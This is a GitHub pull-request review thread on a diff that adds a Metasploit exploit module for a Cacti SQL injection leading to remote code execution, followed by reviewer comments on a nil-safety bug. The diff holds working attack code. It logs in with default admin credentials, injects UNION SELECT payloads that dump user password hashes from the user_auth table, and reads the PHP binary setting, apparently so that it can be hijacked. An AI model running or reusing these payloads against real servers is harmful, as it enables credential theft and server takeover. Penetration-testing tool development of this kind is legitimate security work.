modules/exploits/unix/http/cacti_filter_sqli_rce.rb

```diff
@@ -0,0 +1,224 @@
+          'PrependFork' => true
+        },
+        'Arch' => ARCH_CMD,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'Side Effects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => '2020-06-17',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
+        OptString.new('TARGETURI', [ true, 'The URI of Cacti', '/cacti/']),
+        OptBool.new('CREDS', [ false, 'Dump cacti creds', true])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+      # cacti gives us the version in a JS variable
+      /var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body
+
+      if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')
+        vprint_good("Version Detected: #{version}")
+        return Exploit::CheckCode::Appears
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    begin
+      cookie = login
+
+      # optionally grab the un/pass fields for all users.  While we're already admin, cred stuffing...
+      if datastore['CREDS']
+        # https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png
+        print_status('Dumping creds')
+        res = inject(cookie, "')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
+        res.body.split.each do |cred|
+          /"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred
+          next unless hash
+          next if hash == 'hex' # header row
+
+          print_good("Username: #{username}, Password Hash: #{hash}")
+          report_cred(
+            username: username,
+            password: hash,
+            private_type: :nonreplayable_hash
+          )
+        end
+      end
+
+      print_status('Backing-up path_php_binary value')
+      res = inject(cookie, "')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")
+
+      # return value:
+      # "name","hex"
+      # "","FEFCFF"
+      # "/usr/bin/php","3"
+      php_binary = res.body.split.last.split(',')[0].gsub('"', '') # take last entry on page, and split to value
```

Comment:
`nil`-safe?

Reply:
This gives a stack trace against 1.2.16  where the response is an empty string
```
[7] pry(#<Msf::Modules::Exploit__Unix__Http__Cacti_filter_sqli_rce::MetasploitModule>)> res.code
=> 200
[9] pry(#<Msf::Modules::Exploit__Unix__Http__Cacti_filter_sqli_rce::MetasploitModule>)> res.body
=> ""
```

Might be worth prepending the autocheck mixin

Reply:
Thanks for checking it out! Narrator: _It was not `nil`-safe._